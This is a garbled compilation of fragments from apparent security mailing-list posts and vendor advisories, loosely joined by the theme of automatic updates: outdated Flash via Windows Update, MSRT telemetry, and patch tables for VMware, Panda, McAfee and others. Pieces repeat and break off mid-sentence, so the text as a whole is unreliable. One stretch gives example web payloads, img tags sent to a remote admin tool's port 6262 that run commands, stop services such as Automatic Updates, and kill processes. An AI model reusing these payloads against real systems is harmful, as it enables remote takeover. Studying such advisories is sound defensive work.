automatic updates
Windows Update (as well as Microsoft Update and the Automatic Update)
installs an outdated (and from its manufacturer unsupported) Flash
Player ActiveX control on Windows XP.
Although this fact is nothing really new it but shows the lack of taking
care for security problems and in general the chuzpe of many software
"producers" to ship their "products" with outdated and often vulnerable
components.
>Flash Player 10.0 r22
>
>--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugtraq@securityfocus.com:
>
>SK> Windows Update (as well as Microsoft Update and the Automatic Update)
>SK> installs an outdated (and from its manufacturer unsupported) Flash
>SK> Player ActiveX control on Windows XP.
>
>
>SK> Although this fact is nothing really new it but shows the lack of taking
>SK> care for security problems and in general the chuzpe of many software
Flash Player 10.0 r22
--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugtraq@securityfocus.com:
SK> Windows Update (as well as Microsoft Update and the Automatic Update)
SK> installs an outdated (and from its manufacturer unsupported) Flash
SK> Player ActiveX control on Windows XP.
SK> Although this fact is nothing really new it but shows the lack of taking
SK> care for security problems and in general the chuzpe of many software
* The result of malicious software removal
* The operating system version
* The operating system locale
* The processor architecture
* The version number of the tool
* An indicator that notes whether the tool is being run by Microsoft Update, Windows Update, Automatic Updates, the Download Center, or from the Web site
* An anonymous GUID
* A cryptographic one-way hash (MD5) of the path and file name of each malicious software file that is removed from the computer
If apparently malicious software is found on the computer, the tool prompts you to send information to Microsoft beyond what is listed here. You are prompted in each of these instances, and this information is sent only with your consent. The additional information includes the following: * The files that are suspected to be malicious software. The tool will identify the files for you.
* A cryptographic one-way hash (MD5) of any suspicious files that are detected.
You can disable the reporting feature. For information about how to disable the reporting component and how to prevent this tool from sending information to Microsoft, click the following article umber to view the article in the Microsoft Knowledge Base:
- Internet Security 2009 (Hotifx)
- Panda Antivirus Pro 2009 (Hotfix)
- Panda Security for Business with Exchange
- Panda Security for Business
- Panda Security for Enterprise
- Panda GateDefender Integra (patched through automatic updates)
- Panda GateDefender Performa (patched through automatic updates)
- Panda AdminSecure (patched thorugh automatic updates)
SaaS
- Panda Managed Office Protection
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =================
Update Manager 1.0 Windows Update Manager fix for Jetty *
Update Manager 4.0 Windows Update Manager fix for Jetty *
Update Manager 4.1 Windows Update Manager fix for Jetty *
* Refer to VMware Knowledge Base article 1023962
- Internet Security 2009 (Hotifx)
- Panda Antivirus Pro 2009 (Hotfix)
- Panda Security for Business with Exchange
- Panda Security for Business
- Panda Security for Enterprise
- Panda GateDefender Integra (patched through automatic updates)
- Panda GateDefender Performa (patched through automatic updates)
- Panda AdminSecure (patched thorugh automatic updates)
SaaS
- Panda Managed Office Protection
. Older versions may be affected, but were not checked.
*Non-vulnerable Packages*
. BitDefender Antivirus 2008 builds available through automatic updates,
posterior to January 18th.
. Comodo Firewall Pro 3.0
. Rising Antivirus 20.38.20
If "Web View Content" is enabled in Windows Explorer, which is the
default setting, a single click will open the malicious file in the
preview pane and trigger the vulnerability.
DirectX 9.0c is listed as an optional update for Windows 2000 operating
system in Windows Update site. It is not listed as a critical update.
However, installing this update will remove this vulnerability.
IV. DETECTION
iDefense has confirmed Microsoft DirectX 7.x and Microsoft DirectX 8.x
as well as
<http://www.microsoft.com/downloads/details.aspx?FamilyID=a5c84275-3b97-4ab7-a40d-3802b2af5fc2>
for the previous updates.
Fortunately the eventually installed outdated VC++ runtime will be
updated by the "Automatic Updates" feature of Windows with the hotfix
MS09-035 alias KB973551, IFF the Windows administrator has opt'd-in
to "Microsoft Update".
If not, all users of OpenOffice.org (as well as other poorly crafted
software which distributes outdated 3rd-party DLLs) are put at risk!
This paper explains an attack vector inherent to certain WDM audio
drivers running on Windows Vista, XP, 2000 and 2003. Successful
exploitation could lead to local escalation of privileges.
The paper also covers the interesting case of es1371mp.sys, a vulnerable
WDM driver that can be automatically installed through Windows Update,
on systems with Ensoniq PCI 1371 based SoundCards (Certain VMware
products emulate a soundcard of this type).
It can be downloaded at :
(v 1.01)
/index.aas?job=command&action=calc.exe
Example 3 - Stopping Services:
<img src="http://[AAS IP or DYNDNS
HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">
This for example would disable Automatic Updates:
/index.aas?job=setservice&action=stop&select=wuauserv
Example 4 - Killing Processes:
<img src="http://[AAS IP or DYNDNS
HOST]:6262/index.aas?job=killprocess&select=[exename]">
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
======== ======== ======= =======================
Virtual- 2.5 Windows Update 3 build 119838
Center
Virtual- 2.0.2 Windows not affected
Center
hosted * any any not affected
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows affected, patch pending
VirtualCenter 2.0.2 Windows affected, patch pending
Workstation any any not affected
SOLUTION
Stop using ICQ or switch to another IM client until a fix is released
since ICQ 7 does not offer to disable automatic updates.
TIMELINE
2010-11-12
everyone is happy.
The concept of Microsoft's Malicious Software Removal tool not being a backdoor is
flawed. For starters, no information is ever disclosed to someone installing the Windows
Malicious Software removal tool: "Windows will now install a program which will report
suspicious activity to Microsoft". As far as I can recall on any Windows update, there has
never been any mention of it.
"But this is a wonderful tool, why are you being such a troll and knocking Microsoft for
doing the right thing!". The question slash qualm I have about this tool is I'd like to know
what, why, when and how things are being done on my machine. It's not a matter of
Trustix Secure Linux is a small Linux distribution for servers. With focus
on security and stability, the system is painlessly kept safe and up to
date from day one using swup, the automated software updater.
Automatic updates:
Users of the SWUP tool can enjoy having updates automatically
installed using 'swup --upgrade'.
Questions?
- F-Secure Anti-Virus for MIMEsweeper 5.61 and earlier
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches distributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "F-Secure offers a broad range of PC and internet security
products made for your home or business, so you will
Trustix Secure Linux is a small Linux distribution for servers. With focus
on security and stability, the system is painlessly kept safe and up to
date from day one using swup, the automated software updater.
Automatic updates:
Users of the SWUP tool can enjoy having updates automatically
installed using 'swup --upgrade'.
Questions?
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows not affected
VirtualCenter 2.0.2 Windows not affected
Workstation any any not affected
>
>
> SOLUTION
>
> Stop using ICQ or switch to another IM client until a fix is released
> since ICQ 7 does not offer to disable automatic updates.
>
>
> TIMELINE
>
> 2010-11-12
Avast! Multiple Vulnerabilities
BACKGROUND
Avast! antivirus software represents complete virus protection, offering full desktop security including a resident shield. Daily automatic updates ensure continuous data protection against all types of malware and spyware. Avast! antivirus is certified by both ICSA Labs and West Coast Labs Checkmark.
Avast! Professional Edition 4.8 is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses, spyware and rootkits. It represents a best-in-class antivirus solution for any Windows-based workstation.
Source: http://www.avast.com
VULNERABLE PRODUCTS
Original Vendor Advisories:
http://www.adobe.com/support/security/bulletins/apsb08-13.html
http://www.adobe.com/support/security/advisories/apsa08-01.html
== Solutions ==
Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2
available here:
http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849.
== Credit ==
Discovered and advised to Adobe February , 2007 by Paul Craig of
Trustix Secure Linux is a small Linux distribution for servers. With focus
on security and stability, the system is painlessly kept safe and up to
date from day one using swup, the automated software updater.
Automatic updates:
Users of the SWUP tool can enjoy having updates automatically
installed using 'swup --upgrade'.
Questions?
- McAfee Active Virus Defense
- McAfee Active VirusScan
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches dsitributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "McAfee proactively secures systems and networks from known
and as yet undiscovered threats worldwide. Home users, businesses,
- Norton AntiVirus
- Norton Systemworks
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches distributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "Symantec helps consumers and organizations secure and
manage their information-driven world. Our software and services
from http://heartbeat.skype.com/2007/08/what_happened_on_august_16.html:
The disruption was triggered by a massive restart of our users'
computers across the globe within a very short timeframe as they
re-booted after receiving a routine set of patches through Windows
Update.
The high number of restarts affected Skype's network resources.
This caused a flood of log-in requests, which, combined with the
lack of peer-to-peer network resources, prompted a chain reaction
that had a critical impact.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.0 Windows affected, patch pending *
VirtualCenter 2.5 Windows Update 6
VirtualCenter 2.0.2 Windows affected, patch pending
Workstation any any not affected
Player any any not affected
Original Vendor Advisories:
http://www.adobe.com/support/security/bulletins/apsb08-13.html
http://www.adobe.com/support/security/advisories/apsa08-01.html
== Solutions ==
Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2
available here:
http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849.
== Credit ==
Discovered and advised to Adobe February , 2007 by Paul Craig of
* Test Plan module (testplan.tds)
The customization feature of Quality Center is often used for:
* Controlling password compliance (no blank password, more than 8 letters, etc.)
* Chained lists (when a value is selected in a field, another field gets updated with a list relevant to that value)
* Automatic updates to some QC components (Test, Test Set, Defect objects, hidden fields)
* Hidding information depending on the user's group (used when a project is shared with different vendors)
* Others
The workflow is often driven by using the OTA (Open Test Architecture), the Quality Center API. This API allows the manipulation of any QC object (e.g. Subject folder, Test/Defect objects, Fields, etc.). It also allows the direct manipulation of the database used by Quality Center.
|
